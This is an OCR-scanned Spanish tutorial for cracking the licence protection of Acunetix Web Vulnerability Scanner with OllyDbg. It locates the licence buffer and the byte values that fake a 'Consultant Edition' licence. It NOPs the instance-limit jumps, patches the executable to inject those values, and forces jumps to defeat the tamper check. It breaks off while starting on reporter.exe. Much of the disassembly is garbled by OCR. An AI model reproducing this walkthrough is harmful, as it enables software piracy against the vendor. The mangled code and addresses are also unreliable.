1739! MOU EAX, DWORD PTR DS: CAESESSI [OBAESESSJ]=B0AEAY6C 
1297 | MOU EAX, DWORD PTR DS: CAESE38J [OBAESE33]=50BAEA7Té6C 
)789| MOU EAX, DWORD PTR DS: CAESESSI [OBAESE33J]=B0AEAY6C 
17C9!| MOU EAX, DWORD PTR DS: CAESE38J [OBAE3E33I=50BAEATé6C 
JD6S| MOU EAX, DWORD PTR DS: CAESESSI [OBAESE33]=B0AEA76C 
)O7S| MOU EAX, DWORD PTR DS: CAESE38J [OBAESE33I]=50BAEATéC 
JOS7|MOU EAX, RD PTR DS: CAESESS1] [OBAESE33SJ]=B0AEA76C 
4B86| MOU EAX, DWORD PTR DS: CAESE38J [OBAESE233]=55BAEA7Té6C 
S563| MOU EAX, DWORD PTR DS: LCAESESSI ErOESESal Pene nTSS 
511/M0U EDX,DWORD PTR DS: CAES3E38SJ Wus. BO! 

:51F | MOU EDX,DWORD PTR DS: CAESES38J UUSOBRERTeC 

:52D| MOV EDX, DWORD PTR DS: CAESE38] Wus . BORAEATEC 

'BDE| MOU EAX, DWORD PTR DS: CAESES38J [OBAEZSE33 ]=B0AEA76C 
BED! MOU EDX, DWORD PTR DS: CAESES38] wus. BOREATEC 

¿CSF | MOU EAX, DWORD PTR DS: CAESES38J COBAESE33]=B00NEA7E! 
"188 | MOU EAX, DWORD PTR DS: CAESES8] ESORESESS 3=86nEA7eC 
189 | MOU EDX,DWORD PTR DS: CAESE38J ny 

"1F7/M0U EAX, DWORD PTR DS: CAESES8] CSBhÉSESe 1 SOnEnZec 
HFB2| MOU EAX, DWORD PTR DS: CAESE38J [OBAESE23]I=50BAEATé6C 
HFC1|MOU EDX, DWORD PTR DS: CAESES8] Wus . BOREATEC 

HFES9| MOU EAX, DWORD PTR DS: CAESE38J [OBAESE33]=B0AEA7E 
:69D| MOU EAX, DWORD PTR DS: CAESES38] ESORESESS 3=86nEATeC 
:B9C | MOU EDX, DWORD PTR DS: CAESES38J ny 

:BAE | MOU EAX, DWORD PTR DS: CAESES8] [S6hESE Ss ¡=SogEnTeC 
:574| MOU EAX, DWORD PTR DS: CAESE38J [OBAESE33I]=B0AEA7E 
1117 MO0U EAX, DWORD PTR DS: CAESES38] ODRESESSI-OBRERTeC 
113F|MOU EAX, DWORD PTR DS: CAESE38] C[OBAESES3J]=0B0AEAT6Cc 
1140! MOU EAX, DWORD PTR DS: CAESES38] [OBAESESS]=B0AEA7Y6C 
1158| MOUÚ EAX, DWORD PTR DS: [AESE38] [OBAESE33J]=BBAEA76C 
1166| MOU EAX, DWORD PTR DS: CAESESSI [OBAESE33J]=B0AEA76C 
117B/ MOU EAX, DWORD PTR DS: CAESES38] COBAESES3]=50BAEAT6C 
MAF!MOU EAX, DWORD PTR DS: CAESESSI [OBRESESS ]=BBAERTEC 
1377| MOU EAX. DWORD PTR DS: CAESES38] (Initial CPU selectior 
33DC! MOU EAX, DWORD PTR DS: CAESES38] [ODAESESSI=00AEA7EC 
J3ED' MOU EAX, DWORD PTR DS: CAESES8] od 
I3F9| MOU EAX, DWORD PTR DS: CAESE38J COBAESE33J]=B0AEA7E! 
1497| MOU EAX, DWORD PTR DS: CAESESSI FOSRESESS 1 -09RERrec 


Como les decia mis sospechas eran ciertas pues el software 
utiliza esa direccion de memoria en muchisimos otros 
lugares , posiblemente para hacer chequeos de la licencia , 
pongamos un Break Point en todos ellos y ahora si 
ejecutemos el Olly debugger y veamos en donde parara , 
veamos. 


DWORD PTR DS: [AE3E38 1 
DWORD PTR DS: [EAX 1 


DWORD PTR DS: [AE2A9C1 
BYTE PTR DS: [EAX1 
E 


WORD PTR DS: [ACB8EA4] 


DWORD PTR DS: [AE23441 
DWORD PTR DS: [EAX 1 
P 


Ok como vemos que hace unas comparaciones y de hay 
verifica si tu version es valida para correr varias instacias en 
el mismo pc , creo que la version mas completa te permite 
hasta 10 instancias corriendo, bien sigamos viendo donde 
mas detiene la ejecucion y ver que otras comparaciones hace. 


[AAA MU AA AA A A A A A] A] E] E] | 2] E] | E] E] 
| DWORD PTR DS: [AE3E38 1 
DWORD PTR DS:[EAX 1 
BYTE PTR DS: [EAX+41] 
JNZ 


DWORD PTR DS: [AE3564]. 
DWORD PTR DS: [EAX] 


Vemos que paro donde saca de la direccion de memoria 
OxAE3E38 , un buffer y compara el contenido de ese buffer+4 
si es igual a O y de caso contrario ya no ejecuta el “activation” 


Ahora bien ya tenemos el dato que en esa direccion de 
memoria debe valer a 1, cambiemosle el byte a 1. 


Address [Hex 


Sigamos la ejecucion del software y veamos en donde mas 
ocupa esa direccion de memoria , sigamos 


DWORD PTR 
DWOR >: LEAR 
BYTE PTR DS: [EAR +48] 


DWORD PTR DS: [AE3E381 
DWORD PTR DS: [EAR 1 


DWORD PTR DS: [AE3E381 


DWORD PTR DS: [EAR 1 
DWORD PTR DS: [EAR+3C1 


DWORD PTR DS: [AE3E381 


DWORD PTR DS: [AE3E381 


vemos que compara el mismo buffer + 48 si es igual a O y de 
ser correcto salta el mensaje que nos diria cuando caduca la 
licencia, en este caso el buffer+48 vale O asi que no nos 
preocupamos pero hay que tenerlo en cuenta, seguimos la 
ejecucion haber que otra sorpresa nos tiene el software. 


64:892B MOU DWORD PTR FS:[EAX],ESP 
Al 383EAEG6 |MOU EAX.DWORD PTR DS: [ÁE3E381 
8B90 MOU EAX,.DWORD PTR DS: LEAX 1] 
. 8078 64 Ba CMP BYTE PTR DS:[EAX+41. 
. BF84 17610004 JE wus 00988420 
E8 FE82A8FF |CALL wus .8B418C8C 
83C4 F8 
DD1C24 
9B 
64 BB Ar: 515151515151515] 
33C9 
33D2 


33C0 
E8 B2M8C6FF |CALL WUS . id 
DD5D FA FSTP QUORD PTR SS: [EBP-1 


9B 
Al 383 EAEB0 EAX,.DWORD PTR DS: [AE3E38 1 
8B0bn EAX DWORD PTR DS: [EAX 1 
EDX DWORD PTR DS : [EAX +68 ] 
DWORD PTR SS:UI] » EDX 
EDX , DWORD PTR DS: [EAX+6C1 
RI se ON ] ], EDA 
FL R] IR SS:LEJ 
| FCOMP. DWORD PTR DS: [98848 ] 


HF 
¡JBE wus .B0988A14 


FF75 F8 DWOJ 

E8 64BM6C6FF |CALL wus. 05 ES FCO 
8BD8 MOU EBX,EAX 

FF7?5 F4 DWORD PTR SS: 


Bien paro la ejecucion en otra comparacion al mismo buffer+4 
con O, pero en este caso esta valiendo 1 (true) y de ser asi 
vemos mas abajo que nos saltea este pedazo de codigo 


MOU EDX,.DWORD PTR DS 

LEA EAX DWORD PTR SS 

MOU ECX,wus .860988A54 ASCII "Activation.xml" 

CALL wus .084805CA8 

MOU EDX.DWORD PTR SS: [EBP-141] 

MOU EAX,.DWORD PTR : [TAEDBBCI 

CALL wus .00987C94 
EAX .DWORD PTR : [AE3E38 1 
EAX DWORD PTR : [EAX 1 
EAX,.DWORD PTR : [EAX +24] 
EAX 
EAX DWORD PTR : [AE3E38 1 
EAX DWORD PTR : [EAX 1 
EAX,.DWORD PTR : [EAX +38] 
EAX 


EAX,.DWORD PTR : [AE3E38 1 
EAX, DWORD PTR : [EAX 1 
EAX,.DWORD PTR : [EAX+2C] 
EAX 
EDX DWORD PTR SS: [EBP-18 1 
EAX,DWORD PTR : [AE3E38 1 
EAX,.DWORD PTR : [EAX 1 
EAX,DWORD PTR : [EAX +34] 
CALL wus .006A54D4 
OU EAX. DWORD PTR SS: [EBP-18 1 


EAX 
EAX, DWORD PTR : [AEDBCO 1 
EAX 


wus .B09896D8 

EAX. DWORD PTR DS: [AE3E38 1 

EAX,.DWORD PTR DS: [EAX 1 

EDZ,.DWORD PTR DS: [EAX+28 1 

EAX. DWORD PTR SS: [EBP-1C1] 

ECX,wus .B0988A6C ASCII " <AutofActivation 
CALL wus .00405CA8 


WO 


Bien , si recuerdan el contenido del buffer se quedo valiendo 1 
por lo tanto tenemos que entrar en la rutina , pero no nos 
pondremos a investigar , seria muy extenso el tutorial y no 
creo que haga alguna otro chequeo , asi que demos run (f9) 
que es lo que hace que sigamos la ejecucion 


Sigamos la ejecucion de codigo y veamos si existen otros 


chequeos , sigamos... 


ES 3194BFFF [CALL wvs -006278D0 

. 837D F8 08 |CMP DWORD PTR SS: [EBP 

.. BF84 B90L000 JE wvs .ABAZESB2 

. 80BE 9COSBBOÍCMP BYTE PTR DS:[ESI+59C1, 

.. BF84 FCOBOBAUJE wus.BBAZESB2 

MN]. Al 383EAEBAB |MOU EAX.DWORD PTR DS: [AE3E38 1 

. 8B90 MOU EAX DWORD PTR DS:[EAX] 

. 8378 10 64 |CMP DWORD PTR DS: [EAX+181, 

.. 0F84 8100000 JE wus.00A2E548 

. 1 A432AEGG [MOV EAX.DWORD PTR DS: [AE32A4] 
8300 MOU FAX .DWORD PTR DS: [EAX] 
BA EGESA289 |MOU EDX,wvs.BBA2E5EB 
ES DO789DFF [CALL wvs.B0485DA8 

.. 74 09 JE SHORT wus .B9A2E4E3 

. 80BE 9405000 CMP BYTE PTR DS:[ESI+5941, 

.. 74 58 JE SHORT wus.B9A2E53B 
B9 ECES5A298 |MOU ECX,wvs .BBA2E5EC 

. BA F8ES5A208 |MOU EDX.wvs.BBA2E5F8 
3300 XOR EAX , EAX 
E8 B4A4C7FF [CALL wus.B96A89A8 
A A432AEG8 |MOU EAX.DWORD PTR DS: [AE32A41 
BA ECESA288 |MOU EDX,wvs .OBA2E5EC 
ES DD'749DFF [CALL wus .M04059E0 
Al 383EAEGA |MOU EAX.DWORD PTR DS: [AE3E381 
8B00 MOU EAX DWORD PTR DS: [EAX] 
8A40 48 MOU AL.BYTE PTR DS: [EAX+48] 

. 84C9 TEST AL,AL 

+ De dE JE SHORT wus .B9A2E52D 

. 8B15 383EAEO(MOU EDX,DWORD PIR DS: [AE3E38] 


"no" 
“IsFirstTime" 


wus .BBAEA76C 


Bien paro en este lugar donde hace otro chequeo pero esta 
vez al buffer+10 y lo compara con 64 (hexa) , al parecer es 
donde chequea , si es la primera vez que lo abrimos el 
software (eso creo) , la rutina es muy grande y no me pondre 
a investigarla pues a mi solo me interesa enfocarme en donde 
hace chequeos a esa direccion de memoria , asi que seguimos 


la ejecucion... 


08 E 


AL 383EAEOO 


-|E?9 A90200009 


83E8 M4 
BF34 C30810004 
48 


.| BF84 15020004 


83E8 5F 
BF34 62020004 


-|E9 8B920090 


8D55 FC 
8BC3 

E8 F?97AAFF 
8D45 FC 

BA 4CDFA2008 
E8 '768'79DFF 


1098AAFF 
CB2EAE0N 
64DFA200 
D9849DFF 
BC2EAE09N 
78DFA2009 
8 CA849DFF 


8D45 F8 
E8 32FCFFFF 
A 
Al 6833AE00 
E8 B5849DFF 


MOU EAX.DWORD PIR DS: [AE3E381 
MOU EAX.DWORD PTR DS: LEAX 1 
MOU EAX . DWORD PTR DS: [EAX+168] 
CMP EAX, 
JG SHORT wwvs.BBA2D4B9 

s .BBA2D62C 


DS5A 
ORT hos DBAZDS3 a 


JE SHORT wus .8B42D4D7 
JMP + +0 dat 
SUB E 

JE oe OBAZDGSS 

DEC EAX 

JE wws.BBA2D6DE 

SUB EAX, 

JE wwus.B8B4A2D734 

JMP wus .89A2D762 

LEA EDXZ,DWORI TR SS: 
MOU EAX, EBX 

CALL wus .004D6CD8 

LEA EAX.DWORD PTR SS: 
MOU EDX,wuvs .BBA2DF4C 
CALL wus .0064B05C64 

MOU EDX.DWORD PTR SS: 
MOU EAX. EBX 

CALL wvs .9864D6D688 

MOU EAX,.DWORD PTR DS: [AE2EC8] 
MOU EDX,wwus .BBA2DF64 

CALL wus .064059EB 

MOU EAX,.DWORD PTR DS: [AE2EBC 1 
MOU EDX,wwus .MBA2DF"78 

CALL wus .004059EB 

LEA EAX,.DWORD PTR SS: 

CALL wus. pOn21158 

MOU EDX, DWORI SS: JP 
MOU EAX, DWORD PTR DS : [AE3368 1 
CALL wvs .964059EB 


[EBP-4 


Switch (cases B..64> 


Case 2 of switch BBA2D49B 


ASCII " <Free Edition>" 


ASCII "Evaluation" 


ASCII 


"Free Edition" 


-. E8 B5849DFF |CAL ' - 
y E9 32028099 
o F4 LEA E PTR SS: [EBP Case 1 of switch BBA2D49B 


08 
ES 9E97AAFF |CALL wvs .BB4D6CD8 
8D45 F4 LEA EAX,.DWORD PTI : [EBP 
BA 20DFA208 |MOU EDX, WUS . 00n2DF90 ** <Consultant Edition>" 
E8 1D879DFF A 
8B55 F4 EDX DWORI 


B?797AAFF [CALL wus. 
CM2EAEGA |MOU EAX.DWORD PTR DS: [AE2EC8] 
BODFA206 |MOU EDX.wus . BBA2DFBA "Licensed" 
80849DFF [CALL wus .004059EB 
BC2EAEBM |MOU EAX.DWORD PTR DS: [AE2EBC] 
C4DFA2688 |MOU EDX.wus . ie "Consultant Edition" 
'21849DFF ¡CALL wus .80405 
383EAEGM |MOU EAX. DWORD PTR DS : [AE3E38 1 
: [EAX ] 
: [EAX +14] 
BA ESDFA26M |MOU EDX.wus .BBA2DFES “"NUSC1IO" 
. E8 25889DFF |CALL wus. 00405DA8 
v 75 BF 
A1 BC2EAEGM 0 
BA FADFA200 2,0 FFA "Consultant Edition <1B8 instal 
E8 4C849DFF |CALL wwus.B04059E08 
8D45 FA LEA EAX.DWORD PTR SS:CEBI 
Eg B4FBFFFF ¡CALL wus. GUA2D150 
8B55 FO MOU EDX,.DWORD sl 
Al 6833AEB8 |MOU EAX. DWORD PTR DS: [AE3368] 
. E8 37849DFF |CALL wus .064059E09 
y E9 B4010009 |JMP wus.B0A2D762 
8D55 EC LEA EDX.DWORD PTR SS: [EBP-14] Case B of switch BBA2D49B 
8BC3 MOU EAX, EBX 
E8 2097AAFF |CALL wus. B04D6CDS 
8D45 EC LEA EAX,.DWORD 1 SS : CEBP-1 
BA 1CEBA268M |MOU EDX.wus. O9N2EB1C ASCII " Enterprise Edition>" 
E8 9F869DFF |CALL wws .B0405C64 


Uhmm Bingo , llegamos a una zona muy importante aqui , 
aqui vuelve hacer un chequeo al mismo buffer pero ahora lo 
hace al buffer+10 en esa direccion , entonces si analizamos la 
rutina , como veremos hay tenemos la version “consultant 
edition” si vemos cual de esos saltos condicionales es el que 
lleva a esa direccion nos encontramos con este salto. 


w 3 2 UR US .DUHZDID7 
. BF84 868610004 JE wus .0842D62C 
83E8 B1 SUB EAX 
, 80F82 FFO9B0O) JB wvs .08A2D 
(724 ?F JE SHORT wus.  BBn2D530 
48 DEC EAX 
JE SHORT wus .BB4A2D4D7 


v|74 23 

.(E9 A9820008 |JMP wus.BBA2D762 
83E8 M4 SUB EAX, 

, | BF84 A uvs - BBA2D685 


Este es el salto indicado , entonces para lograr hacer que 
tome ese salto , vemos mas arriba lo siguiente: 


(1) compara el registro EAX con 3 y de ser igual o 
mayor no manda a otro lugar , entonces debe ser menos 
a 3 el contenido del buffer para poder acercarnos a dicho 
salto. 


(2) Resta el contenido de eax con 1 y despues verifica 
con un salto JB ese salto es tomado si la bandera C 
(carry) esta activa. 


Por lo tanto , no puede ser mayor a tres y tampoco puede 
valer 2 , por lo tanto tiene que vale a 1 


Entonces le damos el valor a esa direccion de memoria , y 
hacemos un recuento de los valores que hemos cambiado que 
son: 


Buffer+4=1 
Buffer+48=0 
Buffer+10=1 


Uff que larga tarea y mas cuando tienes que escribir y al 
mismo tiempo analizar el soft , seguimos la ejecucion y 
paramos en ... 


DE 
A Pa 71849DFF CALL pil aDa0s9E0 
a .” 03 o3EREBO 1 M01- EAX,.DWORD PTR ETT 1 
MOU EAX.DWORD PTR DS: 
$B20 14 MOU EAX.DWORD PTR DS: CEAR+141 
. BA EBDFA29M |MOU EDX.wus.BBA2DFES ASCII "WwUSC1B" 
. E8 25889DFF |CALL wvs .BB485DA8 
, 75 BF JNZ SHORT wus.BBA2D594 
BC2EAEGAM |MOU EAX.DWORD PTR DS: [AE2EBC] 
FADFA206 |MOU EDX.wus. Er FA ASCII "Consultant Edition <1íB instanc 
mr 4C849DFF E ro 0040959 ES 
D45 FB LEA EAX, DWORD CI 
ES B4FBFFFF |CALL wus. -0002D150 
8B55 FA MOU EDX. DWORD : [EBP-18 
Al 6833AEGM |MOU EAX. DWORD PTR DS: [A1E3368 1 
. E8 3'7849DFF |CALL wus .804059EB 
y E9 B4819699 |JMP wus. o 
8D55 EC LEA EDX.DWORD PI : [EBP-14 Case B of switch BBA2D49B 
8BC3 MOU EAX, EBX. 
E8 2089 7AAFF |CALL wus .BB4D6CD8 
8D45 EC LEA EAX.DWORD PTI 3: TEBP-14 
BA 1CEGBA2BM |MOU EDX,wus .BBA2EB1C ASCII " <Enterprise Edition>" 
E8 9F869DFF |CALL wus .90904085C64 
MOU EDX.DWORD PTR SS: [EBP-14 
MOU EAX,EBX 
399 7AAFF |CALL wwus.8084D6D068 
CB2EAEBA |MOU EAX.DWORD PTR DS: [AE2EC8] 
BABDFA28M |MOU EDX,wus .BBA2DFBAB ASCII "Licensed" 
B2849DFF |CALL wus.B04059EB 
BC2EAEGA |MOU EAX.DWORD PTR DS: [AE2EBC] 
3CEM4206 |MOU EDX.wuvs .BBA2E03C ASCII "Enterprise Edition (2 instance 
F3839DFF |CALL wus.B04959EM 
1 383EAEBB |MOU EAX.DWORD PTR DS: [AE3E38 ] 
1515] MOU EAX.DWORD PTR DS: [EAX 1 
8B4B 14 MOU EAX.DWORD PTR DS: [EAX+14] 
BA 68E9A2088 MO U EDX., wuS . 90A2E068 ASCII “"WUSE1B" 


Aqui vemos que compara el buffer+14 y mas abajo entra en 
un call y saliendo hace unas comparaciones para saber que 
version va a correr si la que corre unicamente dos instancias 
Oo la que corre las 10 instancias que creo esa es la mas 
completa por ahora ignoramos esta parte y seguimos la 
ejecucion , ya que esto lo resolveremos al final , recuerdan al 
principio 7? Paramos en un primer breakpoint donde 
chequeaba las intancias , entonces no nos preocupemos ahora 
por eso , seguimos la ejecucion y vemos que mas 
encontramos. 


MA A 


DWORD PTR [AE3E3 


DWORD PTR AR 
BYTE PTR DS: [EAX+58 1 


DWORD PTR D 

DWORD PTR D 
DWORD PTR 
DWORD PTR 


DWORD PTR FS: [EAX 1 


Uff , hace otro chequeo en el buffer+58 y lo compara con O, 
al parecer chequea si ya caduco el periodo de 
mantenimiento , en este caso el buffer vale O , pero igual hay 
que tomarlo en cuenta , seguimos 


8B0g 
8078 49 60 
24 11 


" Al AG3DAEGO 


BA 8CE1A200 
E8 58829DFF 


v EB 76 
Al 383EAE00B 
E39:1515] 
8078 48 BB 
v 74 69 
Al 383EAEBO 
3 :1515] 
8378 3C BB 
v ?C 4D 
68 B4E1A200 
Al 383EAEBB 
E23:1515] 
FF?B 54 
FF?8 58 
8D45 C8 
E8 E2409EFF 
FF75 C8 
68 DCE1A200 


8D55 C4 
Al 383EAEB0M 
8B00 


8B48 3C 

E8 F4089EFF 

FF?5 C4 

8 E8E1A200 
ABIDAEBO 


CMP BYTE PTR DS: [EAX+48 1, 
JE SHORT wvs .B8A2D808 


MOU EAX,.DWORD PTR 
MOU EAX, DWORD PTR 


DS : [AE3E38 1 
DS : [EAX 1 


CMP DWORD PTR DS: [EAX+3C1, 
JL SHORT wus.BBA2D7F1 
2E1B4 


DWORD PTR DS: 
DWORD PTR mes 


LEA EAX.DWORD E 


CALL wvs - 00411090 Ñ 


wus _BOAZE1DO 
LEA EDX,DWORD PIR S 


MOU EAX,.DWORD PTR 


CALL uuS - DBABESCC 
WORD PI 

WUS . 90N2E1E8 

MOU EAX.DWORD PTR 


DS : [AE3E38 1 
DS : [EAX 1 
[EAX +54] 
[EAZ +58] 


: [EBP-38 ] 
EBP-3 
S: [EBP-3C] 
DS : [AE3E38 1 
DS : [EAX 1 
DS : [EAX+3C] 


: [EBP-3C] 


DS : [AE3DAB1 


ASCII "The license key has expiredt" 


ASCII "The license key will expire on 


ASCII " days left" 


(5151515151513) 
2D859DFF 
B BF 
ABIDAEGO 
FCE1A208 


MOU_EDX-. 

CALL wvus .00405D1C 

JMP SHORT wus.BBA2D890 

MOU EAX,.DWORD PTR DS: [AE3DAB] 
MOU_ EDX,wus .8BA2E1 FGC 


ASCII "Evaluation expired" 


Bien hizo otra parada , uff son muchisimos chequeos , aqui 
esta verificando que la direccion de memoria buffer+49 sea 
diferente a O para no lanzarnos el mensaje que ya caduco 
nuestra licencia y un poco mas abajo hace lo mismo en el 
buffer+48 y verifica de lo contrario el contenido sea O ó de lo 
contrario nos lanzaria un mensaje que esta caducando 
nuestra licencia , pero por el momento el contenido del buffer 
esta a nuestro favor , pero tambien debemos tenerlo en 
cuenta . Seguimos la ejecucion haber si hace alguno otro de 
sus 500 chequeos XD jaja , seguimos... 


despues de unas cuantas paradas sin hacer chequeos 
importante llegamos hasta aqui , donde al parecer hace otro 
chequeo haber cuantos escaneos paralelos puede hacer 


DA-07 Y UU DYruUnp P j Do. CH 
8BD3 MOU EDX,EBX 
8BC3 MOU EAX,EBX 
E8 E9FEFFFF |CALL wus.B09BB414 
68 C4B59B0908 wus .BB9BB5C4 ASCII "Parallel scans tmax " 
Al 383EFAEGB |MOU EAX. DWORD PTR DS: [AE3E38 ] 
8B0b MOU EAX.DWORD PTR DS: [EAX 1 
E8 7CEACEFF |CALL wus.B06A9FB8 
5 LEA EDX,.DWORD PTR SS: 


8D55 F8 

E8 882BA5FF |CALL wus .004BEBCC 

FF75 F8 DWORD PTR SS: [EBP-8 
68 E4B59BBB wus .BB9BB5E4 

8D45 FC LEA EAX.DWORD PTR 

BA 8360806088 |MOU EDX., 

E8 C3A7?A4FF |CALL wus .00485D1C 


Entramos en la call con direccion 0x9bb537 y vemos dentro 
de la llamada , esto: 
Y ZVY..- Í 2 A 2 AAA AAA AAA A 


J_ 

MN e 'MOU EBX, EAX 
BI 

all” 


8BD8 
BA F49F6ABM |MOU EDX,wus .0B6A9FF4 ASCII “"WUSELO" 
8B43 14 MOU EAX,.DWORD PTR DS: [EBX+14] 
DC38D6FF |CALL wus .BB40D8A4 
TEST AL,AL 
JNZ SHORT wus.BB6A9FDD 
MOU EDX,wus . BBGAABDA ASCII “"WUSCIB" 
MOU EAX,.DWORD PTR DS:[EBX+14] 
CALL wus .0040D8A4 


AL 
wus .BB6A9FE4 


. 724 87? 
B8 BABBBBDO 
. 5B 


C3 
B8 209000000 
5B 
C3 


hace un chequeo en el buffer+14 y entra a una call donde 
hara todo un procedimiento que la verdad no tengo ni ganas 
de mirar , pero veo que esos saltos condicionales te 
redireccionan a diferentes retornos uno regresa dandole a 
eax= 2 y el otro valiendo eax=0A (10 en decimal) ,y tambien 
doy cuenta que esta rutina es llamada de otros lugares, 


entonces si modifico algo, surtira efecto en varios lugares 
donde quiera entrar a la rutina. 


Asi que lo que hago es nopear esos saltos condicionales de tal 
forma que pase por el retorno que devuelve a eax=A que es 
muy logico es para la version mas completa que permitia 
analizar 10 sitios webs al mismo tiempo , entonces hago los 
cambios y quedaria algo como esto 


DWORD PTR DS: [EBX+ 


DWORD PTR DS: [EBX+ 


ahora sigo la ejecucion y vemos que otras sorpresas tiene 
este soft , seguimos... 


fynacunetix WEB APPLICATION SECURITY 


Web 
Vulnerability 
Scanner 


O 


U-6IRÓ O 


Initialize http fuzzer frame ... 


(A Copyright O 2012 Acunetix Ltd 


El soft sigue corriendo y vuelve a parar la ejecucion en un BP 
donde hace un chequeo normal en el buffer+4 y en el 
buffer+10 que eran los que contenian datos donde decidia si 
estaba registrado y que tipo de licencia contenia , pero 
recuerden que teniamos ya datos en el buffer para seguir el 
funcionamiento como si tuvieramos la version “consultant 
edition” , por lo tanto seguimos ejecutando... 
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le Tools Configuration Help 


NewScan [Y $4 P 4050 02 


Web Vulnerability Scanner 
[5 web Scanner 
(=; Tools 


¿92 Target Finder 
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Acunetix Web Vulnerability Scanner 
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License key 


¿6 AcuSensor 


a] Acunetix Ltd € 2012 All rights reserved. 


| Activity Window 


Por fin... 


Se ejecuto el software correctamente y en version "consultant 
edition” , sin problema alguno ,ya tenemos los datos con lo 
que vamos a realizar un parcheo eficiente 


Bien recordemos lo valores que deben contener las 
direcciones del buffer: 


Buffer+4=1 

Buffer+48=0 
Buffer+10=1 
Buffer+58=0 
Buffer+49=1 


Ahora debemos meter esos valores al buffer y se me ocurre 
una idea , veamos si funciona , recuerdan el primer 
breakpoint? Donde detectaba si estabas ejecutando las 
instancias de lo que te permitia cierta licencia, vayamos hay 


DWORD PTR DS: [AE3E38 1 
DWORD PTR DS: [EAX 1] 


DWORD PTR DS: [AE2A9C1 


BYTE PTR DS: [EAX 1 


WORD PTR DS: [ACB8E4] 


DWORD PTR DS: [AE23441 
DWORD PTR DS: [EAX 1 


En este lugar hay un espacio perfecto para hacer un parche y 
mas porque es el primer chequeo que hace en el buffer 
entonces es perfecto , como veemos el programa jamas 
debera pasar donde estan esas strings que nos hacen sacar 


un mensaje malo , por lo tanto vamos a nopear ese pedacito 
de codigo y escribimos nuestro parche que mete los valores 
correctos a las direcciones de memoria para poder bypassear 
todo correctamente como si tuvieramos una licencia 
completisima :D , el parche sera el siguiente veamos 


Lo que hacemos primero es hacer un push a eax para guardar 
el contenido en el stack (la pila) y no dañar nada , despues 
metemos los valores , 1,1,0,0,0 a las direcciones que 
comentabamos haya arriba que eran: 


Buffer+4=1 

Buffer+48=0 
Buffer+10=1 
Buffer+58=0 
Buffer+49=1 


ahora bien , regresamos al registro eax el contenido que tenia 
y hacemos un salto directo a donde deberia seguir 
ejecutandose el programa y listo .. :) , click derecho "copy tu 
executable - all modifications” 


Copy selection to executable file 


Copy selection to executable file? 


Copy all Skip Cancel 


le damos en copy all ,, le ponemos un nombre al archivo y 
LISTO YA DEBERIA DE FUNCIONA NUESTRO PARCHE :D :D :D 


EJECUTAMOS ... 


Error 


Q The file "wws2.exe” seems to be corrupt! 


NOO!! , alparecer el acunetix se da cuenta que ha sido 
parcheado , pero no nos rendiremos , abrimos el olly en el 
parcheado y hacemos que corra hasta aparecer este 
MessageBox y presionamos "PAUSE” (f12) , nos vamos al call 
stack y vemos esto : 


3E78C|user32.7742E38F user3z. 774 


2E836| user32.MessageBorxTimeoutl user32.7r7s 
2E9E4|? user32.MessageBoxT imeoutA user22.77e 
2EAS6| 7? user32. MessageBoxExA user32,77e 
30090| —hOwner = NULL 

33400 Text = "The file "wws2,exe” seems to be corrup 

10000 y = 

310010 


Sty = MB_ 2 ne O eS APPLMODAL 
30000 Language1D = IM LT 


52065 7 <JMP.tuserd2. PEE ssageBox eee wus2. 00462 
3I000B hOwner = NULL 

Ei Text = he file "wws2.exe” seems to be corrup 

10010 MB_OK 1 MB_ ICONHAND: MB_APPLMODAL 


52560| ? Aa, an461F2C wws2. B0462 
539DE|? wws2. 00462430 wus2. 0046: 
35603| Includes wws2.B04639DE wus2, 10405 
3566B| wws2. BO4BS5BC wus2. BB4DE 
382E3| wws2. B04B562C wwys2. BD4DE 
3F10C| wws2. 00403244 wus2. BBABF 


Vemos dos referencias a MessageBox le damos click derecho a 
la ultima de esas dos ( la que tengo seleccionada en la 
imagen) y le damos click derecho y "folow address in stack” y 
veremos la direccion en el stack 


si le damos click derecho a esa direccion "FOLLOW IN 
DISASSEMBLER” llegamos a esta parte 


DWORD PTR DS:[AE4668 1 


DWORD PTR DS: [419E4C1 


Hay esta la zona encargada de todo si subimos un poco mas 
vemos la api CreateFileA , esa API normalmente se usa en 
este tipo de protecciones para leer el archivo existente y 
delver el tamaño del mismo , por lo tanto le damos un 
Hardware Brakpoint On execution , reiniciamos y corremos el 
debugger y vemos cuando pare ahi 


vemos unas 2 intrucciones mas abajo que hay un salto 
condicional , debemos tomarlo para no pasar por toda el 
codigo de abajo que lo que hace es crear un map del 
ejecutable en memoria toma el tamaño del archivo y mucha 
tonteria mas pues digo tonteria porque con ese salto me burlo 
todo eso , asi que pongamos un JMP que eso hara que salte 


siempre pase lo que pase siempre que pase por hay tiene que 
tomar el salto 


seguimos y nos encontramos con otro salto que igual le 
pondremos un JMP para que igual siempre tome ese salto y 
nos saque de la rutina verificadora 


DWORD PTR DS: [AC53F0 1 
DWORD PTR DS: [EAX 1 
DWORD PTR DS: [ECxX+248 ] 


y listo ya con eso es todo , ahora si volvamos a guardar los 
cambios , listo ahora si probemos , cerramos todo y vemos 
haber como funciona el parche.. 
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Activity Window 
11.26 05:48.35, Populate application menus ... 
11,26 05:48,35, Populate tools bar zen 


Ahora bien hay que probar sus opciones haber si tiene algun 
otro chequeo , vamos a crear un reporte y cuando 
presionamos , veemos esto ... 


37% Acunetix Web Vulnerability Scanner - Web Activation [mes 


Activation Activation 


M Connection You need to activate pour copy of Acunetix Web Vulnerability Scanner. 
Internet connection is required for web activation. 


MM Summary 


Activation details 


Please enter the license key and contact information below: 


License Key: | 


Name: 


Company: 


Email: 


Telephone: 
Country: Afghanistan v 
acunetix 


Offline Activation 


Uhmm Al parecer tiene otro chequeo y no es con el mismo 
buffer pues no paro en ningun Breakpoint, veamos que volvio 
a correr el “activation.exe” , pero recuerden que en la carpeta 
donde se encuentra el software hay unos ejecutables 
activation y reporter , el "reporter.exe” es el que debemos 
enfocarnos ahora , vamos a debugear ese ejecutable , lo 
cargamos y buscamos la string “activation.exe” veamos.... 


ter. 
ter. 
ter. 
ter. 
ter. 
wrter. 
ter. 
ter. 
ter. 
porter. BBSE7AFS 


wter. 


VUSEBDHL 


DOSE7TERAG 
DOSE7TECS 
BOSE7ED4 


DOSE7TEES 


r.OBSE7FOC 
r.BOSE7F1C 


wter. 


wter. 


Bien encontramos eso , si vemos mas arriba pareciera que 
habla de las imagenes o logos del reporte y una de los 
beneficios que se obtienen al ser una version 
edition” es que podemos modificar ese logo sin problemas , 
eso quiere decir que estamos cerca de eso , vayamos a esa 


BOSE7F2C 


DOSETF74 


HSLII "wlet_data. dat" 

ASCII "File is missing or corrupt [error +81). 
ASCII "Invalid passwordt" 

